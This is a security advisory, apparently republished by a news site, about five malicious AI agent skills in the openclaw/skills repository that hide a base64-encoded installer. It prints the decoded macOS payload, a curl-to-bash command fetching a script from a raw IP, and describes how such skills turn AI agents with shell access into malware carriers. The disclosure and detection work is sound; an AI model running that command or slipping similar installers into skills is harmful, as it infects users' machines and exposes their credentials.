🚨 Malware Found in AI Agent Skills: A Security Advisory
Stay on top of this story
Follow the names and topics behind it.
Add this story's key topics to your watchlist so LyscoNews can highlight related developments and future matches.
Create a free account to sync your watchlist, saved stories, and alerts across devices.
Quick Summary
We recently discovered malware hiding in plain sight within AI agent skill files on GitHub. This post details the attack, how we caught it, and what to do if you're affected. During routine AI-powered security reviews on SkillHub — an open-source marketplace for AI agent skills — our automated review pipeline flagged 5 skills from the openclaw/skills GitHub repository as malicious. These skills disguise themselves as useful tools:
Skill Claimed Purpose Downloads
auto-updater Auto-update installed skills 443
gog Google Workspace CLI 176
excel Excel file handling 149
nano-pdf PDF editing 133
youtube-watcher YouTube transcripts 115
Total affected downloads: ~1,016 All five skills follow the same pattern: Present as a legitimate, useful tool Require installing "OpenClawProvider" as a dependency The installation instructions contain a base64-encoded command On macOS, the encoded payload decodes to: /bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"
This silently downloads and executes an arbitrary script from a raw IP address — a textbook malware delivery technique. On Windows, users are directed to a password-protected archive (password: openclaw) from install.app-distribution.net. AI agent skills are a new attack surface. Skills are designed to be loaded by AI agents that often have system-level access — file system, shell execution, network. A malicious skill doesn't just compromise data; it can weaponize the AI agent itself. This is a supply-chain attack targeting developers and AI users. The openclaw/skills repository has 90K+ commits and thousands of legitimate skills, providing cover for the malicious ones. SkillHub uses a multi-phase AI review pipeline: Phase A: Quick content filter scans for suspicious patterns (base64 blobs, encoded URLs, eval/exec patterns) Phase B: Deep file analysis examines the full skill contents and identifies obfuscated execution chains The AI reviewer identified the base64→curl→bash pattern and automatically flagged the skills as malicious. All five skills were immediately: Flagged as malicious (warning page, not 404) File downloads blocked (HTTP 403) CLI installation blocked Removed from all browse/search listings If you've installed any skills from openclaw/skills, check for: grep -r "OpenClawProvider" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null grep -r "91.92.242.30" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null
If found: Delete the skill files, check your shell history and crontabs, rotate any credentials that were accessible, and run a malware scan. IP: 91.92.242.30 (Omegatech LTD, Seychelles) Domain: install.app-distribution.net Pattern: "OpenClawProvider" in setup instructions
Read the complete advisory with detailed remediation steps: blog.palebluedot.live/malware-openclaw-skills-security-advisory Investigation is ongoing. If you find suspicious skills, report them on SkillHub's support page. SkillHub is an open-source marketplace for AI agent skills with automated security review.